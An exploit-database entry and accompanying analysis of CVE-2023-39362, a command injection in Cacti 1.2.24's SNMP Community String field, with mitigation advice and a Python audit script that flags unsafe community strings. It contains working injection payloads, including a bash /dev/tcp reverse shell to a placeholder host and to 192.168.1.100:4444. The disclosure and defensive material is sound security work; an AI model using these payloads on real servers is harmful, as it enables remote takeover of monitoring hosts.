Cacti 1.2.24 - Authenticated command injection when using SNMP options

Exploit Author: Antonio Francesco Sardella
Analysis Author: www.bubbleslearn.ir
Category: WebApps
Language: PHP
Published Date: 2023-10-09
# Exploit Title: Cacti 1.2.24 - Authenticated command injection when using SNMP options
# Date: 2023-07-03
# Exploit Author: Antonio Francesco Sardella
# Vendor Homepage: https://www.cacti.net/
# Software Link: https://www.cacti.net/info/downloads
# Version: Cacti 1.2.24
# Tested on: Cacti 1.2.24 installed on 'php:7.4.33-apache' Docker container
# CVE: CVE-2023-39362
# Category: WebApps
# Original Security Advisory: https://github.com/Cacti/cacti/security/advisories/GHSA-g6ff-58cj-x3cp
# Example Vulnerable Application: https://github.com/m3ssap0/cacti-rce-snmp-options-vulnerable-application
# Vulnerability discovered and reported by: Antonio Francesco Sardella

=======================================================================================
Cacti 1.2.24 - Authenticated command injection when using SNMP options (CVE-2023-39362)
=======================================================================================

-----------------
Executive Summary
-----------------

In Cacti 1.2.24, under certain conditions, an authenticated privileged user can supply a malicious string in the SNMP options of a Device, achieving command injection and remote code execution on the underlying server.

-------
Exploit
-------

Prerequisites:
    - The attacker is authenticated.
    - The privileges of the attacker allow managing Devices and/or Graphs, e.g., "Sites/Devices/Data", "Graphs".
    - A Device that supports SNMP can be used.
    - Net-SNMP Graphs can be used.
    - The PHP snmp module is not installed.

Example of an exploit:
    - Go to "Console" > "Create" > "New Device".
    - Create a Device that supports SNMP version 1 or 2.
    - Ensure that the Device has Graphs with one or more templates of:
        - "Net-SNMP - Combined SCSI Disk Bytes"
        - "Net-SNMP - Combined SCSI Disk I/O"
        - (Creating the Device from the template "Net-SNMP Device" will satisfy the Graphs prerequisite)
    - In the "SNMP Options", for the "SNMP Community String" field, use a value like this:
        public\' ; touch /tmp/m3ssap0 ; \'
    - Click the "Create" button.
    - Check under /tmp the presence of the created file.

To obtain a reverse shell, a payload like the following can be used.

    public\' ; bash -c "exec bash -i &>/dev/tcp/<host>/<port> <&1" ; \'

A similar exploit can be used by editing an existing Device, with the same prerequisites, and waiting for the poller to run. It may be necessary to change the "Downed Device Detection" field under the "Availability/Reachability Options" section to an option that does not involve SNMP (because the malicious payload can break the interaction with the host).

----------
Root Cause
----------

A detailed root cause of the vulnerability is available in the original security advisory (https://github.com/Cacti/cacti/security/advisories/GHSA-g6ff-58cj-x3cp) or in my blog post (https://m3ssap0.github.io/articles/cacti_authenticated_command_injection_snmp.html).

----------
References
----------

    - https://github.com/Cacti/cacti/security/advisories/GHSA-g6ff-58cj-x3cp
    - https://m3ssap0.github.io/articles/cacti_authenticated_command_injection_snmp.html
    - https://github.com/m3ssap0/cacti-rce-snmp-options-vulnerable-application


Cacti 1.2.24 Authenticated Command Injection via SNMP Options: A Deep Dive into CVE-2023-39362

Security vulnerabilities in open-source monitoring tools like Cacti can have far-reaching consequences, especially when they enable authenticated command injection, a critical flaw that lets an attacker execute arbitrary system commands on the underlying server. CVE-2023-39362 in Cacti 1.2.24 shows how a seemingly innocuous configuration field can become a path to remote code execution.

Understanding the Vulnerability: Authenticated Command Injection in SNMP Options

Cacti is a widely used web-based network monitoring and graphing tool that uses SNMP (Simple Network Management Protocol) to collect performance data from devices. The protocol itself is not the problem here: the way Cacti 1.2.24 handles the SNMP options, in particular the Community String field, is what introduces the flaw.

When an authenticated user with privileges to manage devices or graphs sets the SNMP Community String, the application fails to properly sanitize the input before passing it to system-level commands. This leads to command injection: malicious strings containing shell metacharacters (such as ; and ') are interpreted by the underlying shell as command separators and quoting rather than as data.

Crucially, this vulnerability requires authentication: an attacker must first have access to a Cacti instance with sufficient permissions, typically roles such as Site Administrator or Graph Manager. Once inside, however, they can use the SNMP configuration to escalate privileges or gain full remote code execution.

Prerequisites for Exploitation

Exploiting CVE-2023-39362 requires several conditions to be met:

  • Authenticated access to the Cacti web interface.
  • Privileges to manage devices or create graphs, such as those in the Sites/Devices/Data or Graphs sections.
  • A device configured to use SNMP v1 or v2 (v3 is not affected due to different handling).
  • Graph templates that rely on Net-SNMP (e.g., "Net-SNMP - Combined SCSI Disk Bytes" or "Net-SNMP - Combined SCSI Disk I/O").
  • PHP snmp module not installed. This is the key condition: if the snmp extension is enabled, Cacti uses native PHP SNMP functions, which do not go through a shell. When it is absent, Cacti falls back to invoking the Net-SNMP command-line tools, and that path is the vulnerable one.

Exploitation Example: Creating a Malicious Device

Here is the proof-of-concept payload from the advisory, run against a vulnerable Cacti 1.2.24 instance in a php:7.4.33-apache Docker container:

    public\' ; touch /tmp/m3ssap0 ; \'

This string is injected into the SNMP Community String field during device creation. Let’s break it down:

  • public\' — The first part of the string, which appears to be a valid SNMP community.
  • ; — A shell command separator that allows execution of subsequent commands.
  • touch /tmp/m3ssap0 — A benign command to create a file in the /tmp directory, used as a proof-of-concept.
  • ; — Another command separator.
  • \' — A closing quote to balance the input, preventing syntax errors in the command chain.

When the device is saved, Cacti passes the community string to a system call (e.g., snmpget or snmpwalk) and, because of insufficient sanitization, the whole string reaches the shell without proper escaping. As a result, touch /tmp/m3ssap0 runs as a system command and creates a file on the host.

Advanced Exploitation: Reverse Shell Payload

For full control over the server, an attacker can use a reverse shell payload:

    public\' ; bash -c "exec bash -i &>/dev/tcp/192.168.1.100/4444 <&1" ; \'

This payload leverages the bash -c command to execute a reverse shell. Here’s what happens:

  • exec bash -i — Starts an interactive bash shell, replacing the current process.
  • &>/dev/tcp/192.168.1.100/4444 — Redirects both stdout and stderr to a TCP connection to a listener at 192.168.1.100 on port 4444 (bash's /dev/tcp pseudo-device).
  • <&1 — Redirects stdin from the same connection, so input also arrives over the socket and the session is bidirectional.

If the attacker has a netcat listener running on the specified IP and port, they will receive a shell session directly from the Cacti server, allowing full access to the underlying system.

Why This Vulnerability Exists: Root Cause Analysis

The root cause is Cacti's reliance on external system commands when the snmp PHP extension is not installed. Instead of the extension's native functions, Cacti invokes command-line tools such as snmpget or snmpwalk with user-provided input.

During the device creation or graph polling process, the SNMP Community String is passed directly into the command line without proper escaping or validation. This creates a classic command injection vector.

As noted in the original advisory (GHSA-g6ff-58cj-x3cp), input sanitization and shell escaping were not implemented correctly on this path, i.e., where the PHP snmp module is absent. This is a critical oversight because it assumes the environment is safe, while in practice many deployments, Docker-based ones in particular, lack the snmp extension.

Real-World Impact and Mitigation

Given that Cacti is commonly deployed in enterprise monitoring environments, this vulnerability can lead to:

  • Unauthorized access to sensitive network data.
  • Privilege escalation from a low-level user to root.
  • Exfiltration of configuration files, credentials, or logs.
  • Installation of backdoors or persistence mechanisms.

Immediate Mitigation Steps:

  • Upgrade to Cacti 1.2.25 or later: the vendor has patched this issue.
  • Ensure the PHP snmp module is installed: this prevents the fallback to the vulnerable system calls.
  • Implement strict role-based access control: limit device and graph management to trusted users.
  • Disable SNMP v1/v2: use SNMP v3 with authentication and encryption.
  • Monitor system logs: look for unexpected command executions or file creations.

Security Best Practices for Cacti Administrators

Security hardening should be proactive. Here’s a checklist for administrators:

    Practice            Recommendation
    PHP Extensions      Always install the snmp module. Use "php -m | grep snmp" to verify.
    SNMP Version        Disable SNMP v1 and v2; enforce SNMP v3 with strong authentication.
    Input Validation    Implement custom validation for SNMP fields: reject strings containing shell special characters.
    Access Control
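
As an added example (not part of the advisory, the analysis above, or Cacti's own code), the following Python audit applies the "Input Validation" and "Monitor system logs" advice to stored device records: it checks each SNMP community string against an allowlist and flags v1/v2 devices whose string carries shell metacharacters, including the payload shape shown above. The sample records are constructed, and their column names (snmp_version, snmp_community) are an assumption rather than taken from Cacti's schema.

```python
import re

# Constructed device records shaped like rows of Cacti's host table. The column
# names (snmp_version, snmp_community) are an assumption for this example.
SAMPLE_HOSTS = [
    {"id": 1, "description": "core-sw1", "snmp_version": 2, "snmp_community": "public"},
    {"id": 2, "description": "edge-fw", "snmp_version": 2, "snmp_community": "Ops-R0_v2"},
    # The payload shape from the advisory above, stored as a community string.
    {"id": 3, "description": "lab-host", "snmp_version": 1,
     "snmp_community": "public\\' ; touch /tmp/m3ssap0 ; \\'"},
    {"id": 4, "description": "nas", "snmp_version": 3, "snmp_community": ""},
]

# Allowlist policy: 1-64 printable characters that mean nothing to a POSIX
# shell. SNMP permits arbitrary octets in a community, so this is a deliberate
# local policy for the audit, not a protocol rule.
COMMUNITY_ALLOWED = re.compile(r"[A-Za-z0-9._@-]{1,64}")
SHELL_META = set(";|&$`'\"\\<>()\n")


def is_safe_community(value: str) -> bool:
    """True when the community string satisfies the allowlist policy."""
    return COMMUNITY_ALLOWED.fullmatch(value) is not None


def shell_metachars(value: str) -> str:
    """Shell metacharacters present in value, sorted, for the audit report."""
    return "".join(sorted(set(value) & SHELL_META))


def audit_hosts(hosts):
    """Flag v1/v2 devices (the affected versions) whose community fails policy."""
    findings = []
    for h in hosts:
        if h["snmp_version"] not in (1, 2):
            continue
        community = h["snmp_community"]
        if not is_safe_community(community):
            findings.append({"id": h["id"], "description": h["description"],
                             "metachars": shell_metachars(community)})
    return findings


def snmpget_argv(host: str, community: str, oid: str) -> list:
    """Argument vector for snmpget (v2c). Passed to subprocess.run without
    shell=True, each value is one argument, so metacharacters in it are inert.
    In PHP the equivalent is escapeshellarg() on each value before exec()."""
    return ["snmpget", "-v2c", "-c", community, host, oid]
```

Running audit_hosts(SAMPLE_HOSTS) reports only host 3, with the metacharacters ', ; and \ that the advisory's payload relies on.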